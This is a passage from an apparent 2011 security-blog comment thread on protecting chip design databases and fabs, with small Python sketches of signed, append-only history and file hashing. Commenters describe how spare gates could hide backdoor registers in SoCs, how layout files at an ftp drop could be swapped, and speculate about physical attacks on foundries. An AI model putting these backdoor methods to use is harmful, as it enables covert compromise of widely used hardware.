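# metadata, and the wrapper is signed twice, once with the committer's
# key and once with the repository's key. HMAC-SHA256 stands in for
# real public-key signatures.
import hashlib
import hmac
import json
import time

REPO_KEY = b"repository-signing-key"        # would live in an HSM, not in code
DEV_KEYS = {"alice": b"alice-personal-key"}

def sign(key, blob):
    return hmac.new(key, blob, hashlib.sha256).hexdigest()

def commit(previous_layer: bytes, author: str, new_content: bytes) -> bytes:
    layer = {
        "parent": previous_layer.decode(),
        "author": author,
        "timestamp": time.time(),
        "content_sha256": hashlib.sha256(new_content).hexdigest(),
    }
    body = json.dumps(layer, sort_keys=True).encode()
    wrapped = {
        "body": body.decode(),
        "author_sig": sign(DEV_KEYS[author], body),
        "repo_sig": sign(REPO_KEY, body),
    }
    return json.dumps(wrapped, sort_keys=True).encode()

innermost = commit(b"{}", "alice", b"")                    # the signed blank file
rev1 = commit(innermost, "alice", b"module foo, first cut")
rev2 = commit(rev1, "alice", b"module foo, bug fix")
print(len(rev2), "bytes of nested, append-only history in the outermost doll")
```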

As you can see, as normal, there is a lot of “etc. hand waving” over the details, and with security, as you know, “the devil is in the details”…

It is in reality a very hard problem more so than the KeyMat or PKI problems which form a small subset of the issues.

Anyway, my coffee is getting cold so back to the grindstone 8)

Nick P January 4, 2011 4:19 PM

@ RobertT

We both share an interest in mobile security. My interest comes from two reasons: mobile devices are more important and useful than ever, and mobile devices are making the same security mistakes that desktops and servers made early on. If we can secure them, then mobile devices can be used to help solve many larger issues like data loss prevention and credential management. Many people ask me why I don’t store a bunch of random passwords on my phone using KeePass or something. I reply that mobiles have essentially no security and any clever attacker targeting me could easily snatch everything. Hence my interest in using MILS RTOSs in phones. Security starts with the chipset, though.

When I think of chipset security, a few issues come to mind: potential backdoors; attacks exploiting errata; attacks on trusted devices connected to the processor, esp. w/ DMA (should be a four-letter word, imho); glitches (intentional or accidental) that cause leaks/breaches/crashes (e.g. the Intel MMU glitch & the infamous MULTICS flaw); data remanence; EMSEC; physical attacks. When I write it all down, it’s amazing to see just how many issues one must solve before it’s even possible to secure the software. Mind-boggling.

So, first let’s talk backdoors. If you look at my list above, it can happen in several ways: hardware rootkit in SOC; intentional security-breaching glitches in SOC or trusted devices, either at interface or instruction set; working design that increases emanation properties. Everything except the rootkit could easily slip past a review team that doesn’t know what to look for, esp. emsec issues. One research team already made a hardware rootkit to be slipped into the VHDL or Verilog and it only took up a little space. Review team might catch that, but if their repository is insecure it could be inserted in a form of MITM attack. Very real risk, here.

Another concern is that there are so few fabs for chips. I mean, how many fabs are there that turn the blueprints into actual silicon for ARM, POWER, MIPS and x86 CPUs? Idk, but it’s definitely a small number compared to the chip output. Subverting even one would allow backdoors into many, many devices. It’s a real concern to me, esp. if security is as bad as you say. I would say American companies who are concerned should use a DOD-certified fab, but then what’s the risk of DOD backdoors? And are those fabs’ repositories any more secure than foreign ones? Hard to say for outsiders like me.

I think the only solution here is onshore, DOD audited, highly secure fabs that produce chips from authenticated code. At the company submitting the hardware design, a review team might look at their secure repository at the changes and make sure they are traceable. I think Clive’s append-only, every change is signed and explained kind of design is necessary. It also meets the DO-178B style traceability requirements I mentioned, which are essential to counter backdoors. Let’s look into how to design the system to counter external and internal threats.

I’d treat the repository system as a secure enclave. It must be physically secure and tamper-resistant, of course. Few should have access to it and they should be monitored by others. If internet access is necessary for any reason, then all connections to the system should be over a VPN using a dedicated plug-and-play appliance with excellent security and little internal state (Sirrix comes to mind). The signing solution should be hardware so employees can each have one. Developers make changes, explain them, sign them, and send them to the repository. They are merged based on policy, automated or manual. The final version is produced in an automated fashion, timestamped, hashed, and signed. The first exchange of signing keys and identifying information between client and fab will be rigorously protected, then the client’s systems will rigorously protect the signing key.

This system should be made very simply and using a low-defect methodology, running on a minimal safety-critical RTOS. Might even put a gateway between it that converts Ethernet and TCP/IP to a simplified protocol and non-DMA hardware. Another concern is complex, error-prone dev tools and OS’s developers will use. I’d say give them two computers: one to do development on; one that does the signing and displays contents for verification of integrity before signing. They’d be connected by a secure transfer mechanism, perhaps a data diode. The signature computer would be very simple and highly secure. It would be connected to the repository with write access, while the other system only has read access. A KVM switch, perhaps Tenix’s, would let the engineer switch between to ensure he’s signing what he thinks he’s signing.

I’d rather they not work on the stuff at home, but this might not be possible to prevent. In this event, I’d say company-provided MILS kernel laptops are the only option a.t.m. that provides portability, security, and COTS hardware. One partition would be the verification/signing, one the dev machine, a high assurance interface manager prevents spoofing, and the secure information transfer agent along with a MILS mandatory info flow policy would ensure the data moved in the right directions. INTEGRITY Workstation has all this out of the box and I think on a Dell laptop. LynxSecure and Turaya Desktop have potential too, but idk about their hardware & middleware. If x86 is required, I’d use a Core i7, disable all the bloat, and use the IOMMU to keep devices from causing problems. I’d also glue the USB ports and, if it had firewire ports, fire the procurement guy. 😉

I think the design strategy allows for EAL7-level verification of many components, some of which already have (Integrity-178B, Tenix Data Diode). Many medium assurance components exist for the rest and at least three commercial offerings with support staff. It seems like we could solve this problem now. So, what you think of all this?

RobertT January 4, 2011 10:35 PM

@Nick P

Too many points to address immediately; let me try to get us moving in the right direction.

Fabs for Mobile chip sets:
Most new devices today are being targeted at 40 nm processes.
There are only 6 fabs in the world capable of producing volume designs at 40 nm; these are:
1) TSMC (Taiwan)
2) Global Foundries (Abu Dhabi) (old Chartered Semi and AMD fabs)
3) maybe UMC (not sure when 40 nm available) (Taiwan)
4) Samsung (not really a foundry) (S. Korea)
5) Intel (zero presence in mobile device market)
6) IBM (no mobile presence)

The physical security of the mobile device fab production needs to happen in Taiwan (TSMC/UMC), Singapore (old Chartered Semi) and South Korea (Samsung).

As far as I know, neither Intel nor IBM is fabbing any mobile devices; neither are the old AMD fabs in Dresden, Germany (now Global) nor the old IBM/Freescale fabs in the US.

Interfering with a database after delivery to the fab:
This is possible but highly unlikely, because the fab deliverable is typically at a physical layout level (called GDS2 or MEBES data). With an automatically placed “sea of gates” layout/routing, it is difficult (not impossible) to translate this back into a simulation / human-understandable form. However, identifying features like “hard macros”, such as a hand-laid-out Wallace tree multiplier, is fairly easy. Adding several traces to, say, copy the carry-out flag or certain bits of the multiplier is possible. (The big problem is that the extra signals could reduce the execution speed of the block, which would cause someone to look at the chip layout. 40 nm is way below what we can see with visible light, so an optical microscope is useless; to actually know exactly what is on the chip requires inspection layer-by-layer with a SEM/FIB microscope = EXPENSIVE!)

Often these days the fab will supply certain hard macros, such as a PLL, which the chip vendor uses sight unseen. Having an undocumented register within the fab-supplied PLL block and then routing multiplier signals to the undocumented registers is, in theory, possible.

What I’m trying to demonstrate is that it is probably beyond the capabilities of anyone but a state actor to modify a design at the fab level. The other factor limiting this is that the client expects the chips back in under 2 months; not much time to make modifications.

Modifying the Chip database:

For cost reasons Mobile chips are Systems on a Chip (SOC) designs, they contain over 10M transistors and can often have 4 or more main processor cores and as many as 8 state machines (these are often actually small 8 bit microcontrollers). I can guarantee you that the person working on the AES hardware function does not know what happens at the mobile protocol stack level, although both functions are on the one chip. Similarly the Protocol Stack person would never have reason to look into the inner workings of the power management microcontroller. So at the chip top “block assembly” level it would be easy to add undocumented registers that allow these blocks to communicate, thereby creating backdoors. The best location for the backdoors is probably within the least technically difficult blocks, such as within the power management microcontroller or HID interface micro. Both of these are also ideal locations for introducing unexpected side channel communications paths.

As an external person modifying a top-level chip database, it would be possible to add undocumented registers by connecting up unused gates. Normally a new chip design adds extra gates into unused spaces between blocks so that minor errors can be easily patched. Nobody is “in charge” of the extra gates, and having some used, even at the beginning, is not unusual (typically an extra resistor gets added to help with timing errors, or control signals get inverted/delayed to sync blocks, that kind of thing), so it would not be unusual to see these gates used and nobody would wonder what that function does… (basically it’s just some added “glue logic”).

More tomorrow:

RobertT January 5, 2011 12:13 AM

@Nick P
Lots of interesting ideas about chip database security, but believe me NONE of these security barriers exists.

Total system security:
Unix systems without direct web access
Citrix access to a Windows server is sometimes possible.
Some systems are completely stand-alone secure, but most designs require dispersed teams around the world to access the database, so it is typically accessible via a VPN link.

Windows machines and Unix machines are normally on separate network domains.

Chip Database Security :
Unix group permissions (sorry, that’s it, nothing more). Some development software has added security features but it is always disabled.
Usually logs exist for block access, and exception/access-failure logs also exist, but they are only read when a security breach is suspected.

Clive Robinson January 5, 2011 2:42 AM

@ RobertT,

“Some development software has added security features but it is always disabled”

No doubt for “improved workflow” reasons 🙁

“Usually logs exist… …but they are only read when a security breach is suspected.”

Ouch…

With all the security features disabled what would it take to ‘make them suspect’?

With regards the foundry / fab facility what is the actual procedure to ensure that the customer sent package is actually the package they sent?

That is, what’s to stop me substituting my own “physical layout”? And how much does it cost to go from the data held in the design database to the “physical layout”?

The reason I ask is simple really: if the design-database access control is so poor, there appears to be little stopping an employee “checking out” a copy of the design, making some of the alterations you suggest, and then sending their modified version instead of the original.

Clive Robinson January 5, 2011 3:52 AM

@ RobertT,

“There are only 6 fabs in the world capable of producing volume designs at 40nm”

And from what you say, about half of them are not really geared up for mobile chip devices.

I was aware that the number of facilities was going down because the cost was rising (over 1 billion USD back some time ago), but that is too few eggs even if they are not in the same basket.

Which gives me an idea for Bruce’s next Movie plot contest…

Now the last time I visited a foundry (many years ago) I was not overly impressed by the security of the site, and I’m guessing it is not much better these days (it was about what you would expect for a small light-engineering company sited in an industrial park).

Back when doing disaster recovery, ‘site security’ was one of the items on the checklist, and I remember being told a story about the design of certain nuclear facilities. One consideration that was raised was an RPG fired from a helicopter through the roof of the reactor building, and how the engineers quickly reassured the person that it had been taken account of in the design. However, after the person had left, apparently one engineer said “Lucky he didn’t ask what an RPG would do to the waste storage facilities”…

So I wonder if somebody has asked “What if an RPG was fired into the foundry building?”; we know from the IRA attack on the MI6 building in London that it’s not difficult to do. Further, what would the consequences be if, say, three of those plants got a 9/11-style attack…

I do remember 16 years ago an earthquake in Kobe, Japan put a big dent in the production of LCD panels and memory chips for a while, and supposedly (according to some) caused a mini recession…

RobertT January 5, 2011 4:21 AM

@Clive,
“With all the security features disabled what would it take to ‘make them suspect’?”

The checks only exist to catch some young engineer accessing things that they are not authorized to access. To be honest that’s it! This step is only done to limit the scope of a data breach from an inside job.

“With regards the foundry / fab facility what is the actual procedure to ensure that the customer sent package is actually the package they sent?”

Usually transfer is simply through an ftp drop. So the Fab sets up an ftp location which is password protected and the design company transfers the design to the specified location. As a result there is probably nothing stopping a MITM attack on the transfer of the database. In reality this MITM or database substitution would need to happen quickly because there are always plenty of telephone calls coordinating an important database transfer.

If you managed to make this substitution AND your modifications did not cause any execution errors, then they would most likely never be found, or even suspected!

There is one final check, where the fab sends the design company the actual mask-making data, but this is almost never looked at (and few people actually understand the extra data in this file). About the only time anyone ever accesses this mask data is if some functional error is suspected to be caused by what are called Optical Proximity Correction structures, or “fill” metal. These are added by the fab/mask house and so are not in the design/layout database.
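One simple mitigation for the substitution risk, sketched below, would be for both ends to compute a digest of the delivered layout database and compare it over a separate channel (say, one of those coordination phone calls). The file name is hypothetical and this is only an illustration of the check, not current practice.

```python
# Sketch of a cheap check against the drop-box substitution risk
# described above: design house and fab each hash the delivered layout
# database and compare the digests over a separate channel.
import hashlib

def gds_digest(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            if not block:
                break
            h.update(block)
    return h.hexdigest()

# Design house prints this before upload; the fab re-computes it on the
# copy pulled from the ftp drop and reads it back over the phone.
print(gds_digest("tapeout_rev_final.gds"))   # hypothetical file name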

“And how much does it cost to go from the data held in the design database to the “physical layout”?”

In reality you would need to modify the already-completed layout database, because otherwise you would never get an exact match to the original automated layout. The most likely way to do this would be with a manual layout edit at the chip top level: someone would add the extra routes to hook up the spare gates after everything else was done. The cost to make these changes is minimal, say 2 hours’ work for a skilled layout person, but you had better not make a mistake. The mask sets themselves cost several $M for 40 nm, but if you substituted the database then you wouldn’t need to pay this.
